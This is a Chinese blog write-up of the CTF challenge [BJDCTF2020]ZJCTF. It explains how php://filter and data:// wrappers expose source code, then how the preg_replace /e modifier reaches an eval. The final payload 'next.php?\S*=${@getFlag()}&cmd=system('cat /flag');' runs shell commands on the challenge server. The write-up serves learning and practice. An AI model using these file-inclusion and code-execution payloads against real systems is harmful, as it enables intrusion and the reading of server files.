[BJDCTF2020]ZJCTF,不过如此 (ಠ_ಠ,题目名字就这样,我不是,我没有)

最新推荐文章于 2024-07-21 10:17:51 发布
最新推荐文章于 2024-07-21 10:17:51 发布
阅读量71 收藏
点赞数
分类专栏: ctf&靶机 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43632414/article/details/120492741
版权

题目地址:https://buuoj.cn

本题涉及的知识点

审计代码


<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

  • 这里要用到php伪协议

  • file_get_contents,读取文件,或url中的内容

  • 使用data协议向text参数中传递内容

    • ?text=data://text/plain,I have a dream

  • 由于php代码不可能直接打印到网页中(如果没有用特殊的函数)

    • 使用php://filter
    • &file=php://filter/read=convert.base64-encode/resource=next.php

  • 得到base64编码:

在这里插入图片描述

  • 解码得:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

  • 代码审计

    • 实际上得到代码的主体部分就是
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

 分析:很明显,题目的用意是想让我们通过complex函数引出getFlag函数,来实现PHP代码执行

函数漏洞的利用

  • 因为complex函数中存在/e修饰preg_repalce函数的第一个参数,这会致使preg_repalce函数的第二个参数会被当做PHP代码执行。而本题代码中
preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")',$str);

\\1\1的转义,而\1涉及到了正则表达式中的反向引用(知识套知识,知识何其多),可以简单的理解为第一个子匹配项,这里\1的实际值就是preg_replace函数的一个参数,也就是$re的值

  • strtolower()函数就是将参数内容小写

  • 既然preg_replace的第二个参数可控!那么传入/next?/S*=${@getFlag()},这样,就会执行getFlag函数

    • 不懂的话就仔细看看 https://xz.aliyun.com/t/2557

  • 同时getFlag()函数执行,是需要有$_GET[‘cmd’]的,所以最终的结果是

next.php?\S*=${@getFlag()}&cmd="system('cat /flag');"

为什么flag在根目录下,而且文件名是flag…ctf尿性…

在这里插入图片描述

太菜了怎么办?
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]ZJCTF不过如此1
m0_73673698的博客
06-17 998
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
[BJDCTF2020]ZJCTF不过如此
stantic的博客
04-13 810
get方式传了一个text和file参数,判断text有没有以及text的值要等于Ihaveadream,上面成立就输出text的字符串 file_get_contents(读取的文件,) 函数是用于将文件的内容读入到一个字符串中的首选方法。遇到这个就用php://input, post部分用等号右边的字符串。 然后再过滤file参数,不允许有flag,如果没有就包含file参数,后面还提示next.php 显然在tetx参数中用php://input协议,post中Ihaveadre...
BUUCTF [BJDCTF2020] ZJCTF不过如此
Senimo
12-10 566
BUUCTF [BJDCTF2020] ZJCTF不过如此 考点: php伪协议读取源码 函数preg_replace()在\e模式下,存在代码执行漏洞 对于传入的非法的$_GET数组参数名,会将其转换成下划线_ 启动环境,给出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2275
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
justCTF-2020:justCTF 2020
05-24
通过参与justCTF 2020这样的竞赛,选手不仅可以提高自身的HTML技能,还能增强对网络安全的整体认知,为未来的职业发展奠定坚实基础。同时,通过分析justCTF-2020-master这个压缩包文件,我们可以深入研究比赛的具体...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
题目是一个zip包,尝试解压出错,用AZR压缩包修复工具修复后,解压得到一个secret文件,由于没有后缀名,放入010editor查看,发现含有IHDR 可能是缺少文件头,加上png的文件头89504E47后成功打开图片。发现424A44…...
华为HCIP Datacom H12-821 卷42
QIN_yuexiang的博客
07-17 383
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
【Docker】Docker-compose 单机容器集群编排工具
F12138X的博客
07-18 1559
顽强的毅力可以征服世界上任何一座高峰
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 334
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
阿里云短信PHP集成api类
༺墨༒眉༻
07-17 288
无需安装sdk扩展包,直接引入类即可使用。
Ubuntu 查询未更新的包 进行手动更新
小婷
07-19 165
lsb_release -a 查询ubuntu的版本号,我这边是20.04。apt list --upgradable 查询未更新的包。中间遇到输入选择,输入y即可。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 825
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 329
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1079
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
thinkphp8结合layui2.9 图片上传验证
最新发布
quweiie的专栏
07-21 112
thinkphp8图片上传的验证
navicat15已连接忘记密码
07-17 244
2.使用文本打开 connections.ncx。3.复制加密密码,在线解密。
[bjdctf2020]zjctf不过如此
03-16
[bjdctf202]zjctf不过如此,是一道比赛题目的名称。具体的题目内容和解法我不清楚,因为我只是一个人工智能语言模型,没有参加过这个比赛。不过,如果您有相关的问题或者需要帮助,我会尽力回答和帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值